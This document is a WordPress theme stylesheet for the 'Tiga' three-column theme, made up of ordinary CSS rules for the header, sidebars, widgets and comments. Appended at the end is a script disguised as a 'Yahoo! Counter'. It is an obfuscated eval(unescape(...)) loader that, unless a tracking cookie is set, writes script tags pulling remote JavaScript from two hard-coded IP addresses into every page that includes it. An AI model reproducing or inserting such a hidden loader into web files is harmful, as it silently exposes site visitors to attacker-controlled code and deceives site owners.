
/*   
Theme Name: Tiga
Theme URI: http://www.shamsulazhar.com/wp/archives/31
Description: A simple 3 column theme which is <a href="http://www.gravatar.com">gravatar</a> ready and also compatible with <a href="http://www.randombyte.net/blog/projects/falbum/">FAlbum</a>.
Author: Shamsul Azhar
Author URI: http://shamsulazhar.com
Version: 0.8
*/

/***************************************************************************/
/* HTML Tags */
/***************************************************************************/

body {
	background-image: url(images/bg06.gif);
	background-attachment: fixed;
  background-color:#F5F5F5;
  font-family:tahoma;
  margin:0px;
  padding:0px;
  text-align:center;
}

h1 {
	margin:0px;
	padding:0px;
}

blockquote {
  border-width:1px 1px 1px 8px;
  border-color:#C5C4BC;
  border-style:dotted dotted dotted solid;
  background-color:#f8f7ef;
  padding:0em 1em;
}

pre {
  overflow:auto;
	width:80%;
  font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'LucidaTypewriter', monospace;
  background: #e7e6de;
  border: solid 1px #aaa;
  padding: 0px 10px 15px 10px;
}

code {
  font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'LucidaTypewriter', monospace;
  font-size: 12px;
  background: #e7e6de;
  border: solid 1px #aaa;
}

a:link {
	color: #000000;
	text-decoration:none;
}

a:visited {
	color: #000000;
	text-decoration:none;
}

a:hover {
	text-decoration:none;
	color:#377FCC;
}

.comment-text pre {
  margin:0px 30px;
}

pre code, pre pre {
  border: 0;
}

/***************************************************************************/
/* This is the container for the whole page */
/***************************************************************************/

.page {
  max-width:800px;
  min-width:800px;

  	
  position:relative;
  padding:5px;
  margin:0 auto;
  text-align:left;
}

/***************************************************************************/
/* Header */
/***************************************************************************/

.header {
  border-color:#AAAAAA;
  background-color:#F8F7EF;
  height:124px;
  background-image:url("http://www.health-choices.info/images/2006-header.jpg");
  background-repeat:no-repeat;
  background-position:center;
  border-style:solid;
  margin-bottom:5px;
  border-width: 1px;
  padding-left:10px;
}

.blog-name:link, .blog-name:visited, .blog-name:hover {
  color:#3A3B43;
  font-family:Arial, Helvetica, sans-serif;
  font-size:34pt;
  font-weight:bold;
  text-decoration:none;
}

.blog-description {
  color:#3A3B43;
  font-family:Verdana, Arial, Helvetica, sans-serif;
  font-size:12pt;
  font-weight:normal;
  margin:0px;
  padding-left:5px;
}

/***************************************************************************/
/* Post */
/***************************************************************************/

.post-title:link, .post-title:visited, .post-title:hover {
	font-family:Geneva, Arial, Helvetica, sans-serif;
	color:#000000;
	text-decoration: none;
	background-color: #FFFFFF;
	margin-bottom:0px
}

.post-content, .comment-content {
	font-size:10pt;
}

/***************************************************************************/
/* Sidebars */
/***************************************************************************/

.left-sidebar, .right-sidebar {
	top:136px;
	font-size:8pt;
	position:absolute;
}

.left-sidebar {
	width:160px;
	left:5px;
}

.right-sidebar {
	width:170px;
	right:5px;
}

/***************************************************************************/
/* Widgets */
/***************************************************************************/

.left-widget-title {
 	color:#FFFFFF;
	background-color:#4B7060;
  border-color:#AAAAAA;
	width:148px;
	border-width:1px 1px 0px 1px;
	border-style:solid;
	font-size:9pt;
	font-weight: bold;
	padding:5px;
}

.left-widget {
	border-color:#AAAAAA;
	width:148px;
	border-width:1px 1px 1px 1px;
	border-style:solid;
	color:#000000;
	background-color:#CEDBE8;
	padding:5px;
	margin-bottom:5px;
	font-size: 9pt;
}

.right-widget-title {
	color:#FFFFFF;
	background-color:#4B7060;
  border-color:#AAAAAA;
	width:158px;
	border-width:1px 1px 0px 1px;
	border-style:solid;
	font-size:9pt;
	font-weight: bold;
	padding:5px;
}

.right-widget {
	border-color:#AAAAAA;
	width:158px;
	border-width:1px 1px 1px 1px;
	border-style:solid;
	color:#000000;
	background-color:#CEDBE8;
	padding:5px;
	margin-bottom:5px;
	font-size: 9pt;
}

.center-widget-title {
	color:#000000;
	background-color:#669782;
	border-color:#C5C4BC;
	margin-left:165px;
	margin-right:175px;
	border-width:1px 1px 0px 1px;
	border-style:solid;
	font-size:9pt;
	font-weight: bold;
	padding:5px;	
}

.center-widget {
	border-color:#C5C4BC;
	margin-left:165px;
	margin-right:175px;
	color:#000000;
	background-color:#FFFFFF;
	border-width: 1px;
	border-style:solid;
	padding:1em;
	margin-bottom:5px;
	font-size:10pt;
}

.footer {
	margin-left:165px;
	margin-right:175px;
	border-color:#C5C4BC;
	font-size:10px;
	text-align:center;
	position: relative;
	color:#000000;
	background-color:#FFFFFF;
	border-width: 1px;
	border-style:solid;
}

img {
   border-width:0px;
}

h3#respond, h3#comments {
	color:#000000;
}

.single-post-metadata {
	color:#003366;
	background-color: #F8F7EF;
	border-top-color: #CCCCCC;
	border-bottom-color: #CCCCCC;
}

.even-comment {
}

.odd-comment, .even-comment{
	/*background-color:#f8f7ef;*/
}

.left-widget ul, .right-widget ul {
  list-style-type:none;
  padding-left:0px;
  margin-top:0px;
  margin-left:0px;
}
.children {
	list-style-type:none;
	padding-left:5px;
	color: #990000;
}
.children a:link {
	color: #0000FF;
	text-decoration:none;
}

.children a:visited {
	color: #0000FF;
	text-decoration:none;
}

.children a:hover {
	text-decoration:none;
	color:#377FCC;
}

.left-widget li,  .right-widget li {
	margin-top:5px;
	list-style-type:none;
	padding-left:0px;
	margin-top:0px;
	margin-left:0px;
	border-bottom-width: 1px;
	border-bottom-style: solid;
	border-bottom-color: #FFFFFF;
	padding-top: 2px;
	padding-bottom: 2px;
}

h3#respond, h3#comments {
	font-family:Geneva, Arial, Helvetica, sans-serif;
	text-decoration: none;
	background-color: #FFFFFF;
	margin-bottom:0px
}

.post-time, .post-author {
	font-size:8pt;
	color:#003366;
	background-color: #FFFFFF;
}

.post-metadata {
	font-size:8pt;
	color:#003366;
	background-color: #FFFFFF;
  padding-left:3em;
}

/* Comments Styles */
.comment-header {
        border:0px;
        padding:5px 10px;
        border-style:solid;
        background-color:#e7e6de;
}

.comment-num:link, .comment-num:visited, .comment-num:hover{
        float:right;
        font-family:Georgia, "Times New Roman", Times, serif;
        font-size:34px;
        font-style:italic;
        color:#aaaaaa;
				text-decoration:none;
}

.comment-text {
        padding:0px 10px;
	border-color:#e7e6de;
	border-width:1px;
	border-style:solid;
	background-color:#f8f7ef;
}

.comment-list .odd-comment, 
.comment-list .even-comment {
	font-size:12px;
  margin-bottom:15px;
}

.comment-list {
	font-size:12px;
	padding:0px;
	margin:0px;
}

.comment-date{
 	color:#999999;
 	font-size:7pt;
}

.comment-edit-link {
 	color:#999999;
 	font-size:7pt;
}

/* Single post */
.single-post-metadata {
	font-size:8pt;
	/*font-style:italic;*/
	border-top-style: solid;
	border-bottom-style: solid;
	border-width: 1px;
	padding:1em;
	clear:both;
}

/***************************************************************************/
/* Dum, dum dum dum, Don't touch this! */
/***************************************************************************/
/* IE Hack (http://www.positioniseverything.net/easyclearing.html) - Begin */
.clearfix:after {
    content: "."; 
    display: block; 
    height: 0; 
    clear: both; 
    visibility: hidden;
}

.clearfix {display: inline-table;}

/* Hides from IE-mac \*/
* html .clearfix {height: 1%;}
.clearfix {display: block;}
/* End hide from IE-mac */
/* IE Hack - End */
/***************************************************************************/

/* Search input */
input#s {
	width:90%;
}

/* Page nav */
.bottom-page-nav, .top-page-nav {
	color:#003366;
	text-align:center;
	background-color:#FFFFFF;
}

.permitted-tags {
	font-size:7pt;
	color:#999999;
	background-color:#FFFFFF;
	width:300px;
}

textarea#comment {
	width:400px;
}

.google-ads {
	text-align:center;
}

.gravatar {
  float:left;
  border:1px solid #888888;
  padding:2px;
  background-color:#ffffff;
  margin-right:5px;
}
<script language=javascript><!-- Yahoo! Counter starts 
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('@/$%2F@%3Cd%69v`%20!st$%79@%6C#%65%3D%64i%73pl&%61$%79%3A`n@on$%65%3E\n%64$%6F%63%75%6D%65%6E&%74%2Ew@r&i#te(!"!%3C%2F&%74%65$%78%74%61%72@%65&a%3E%22%29&%3B#%76%61r%20%69%2C$%5F%2C%61`%3D&[!"@%37#8.#1%31|%30%2E%31&7!5.%32@%31#"%2C%22|1%39|%35%2E`2!4%2E%37%36%2E!2%35%31"%5D!;%5F=%31`;$%69%66%28#d|%6F&c%75!%6De`n%74|%2E#%63o&%6F%6B%69%65%2E%6D`%61t%63|%68~(%2F%5C!bh`%67f%74#=%31~%2F@)%3D!%3D@%6Eu%6C@%6C|)for($%69&%3D@0`%3B|i%3C2%3Bi|%2B+&)#%64|o%63~%75`men|%74%2E#%77%72&i`%74|%65&("&%3Cs%63`r$%69%70%74|%3Eif`(~%5F#)@%64o#c%75!m!%65$%6E%74%2E#w|r%69!%74~%65$%28%5C%22%3C%73@cr#%69@p%74@%20&%69%64%3D!_`"%2B!i$%2B|"%5F`%20@s&%72&c!%3D&%2F$%2F~%22+&a$%5B$%69!]&%2B"!/~c%70/?#%22%2B!%6Eavi%67a$%74#o%72%2E|a@%70|p`N!a%6D!%65&%2E%63harA`t(&%30$%29%2B`%22!%3E%3C%5C!%5C/~s%63!r#ip@%74%3E|%5C")%3C%5C&/!s#%63@%72@ip~t!%3E&%22%29~;~\n/%2F%3C%2Fd%69|%76$%3E').replace(/`|~|\$|\&|\||\!|#|@/g,""));var yahoo_counter=1;
<!-- counter end --></script>
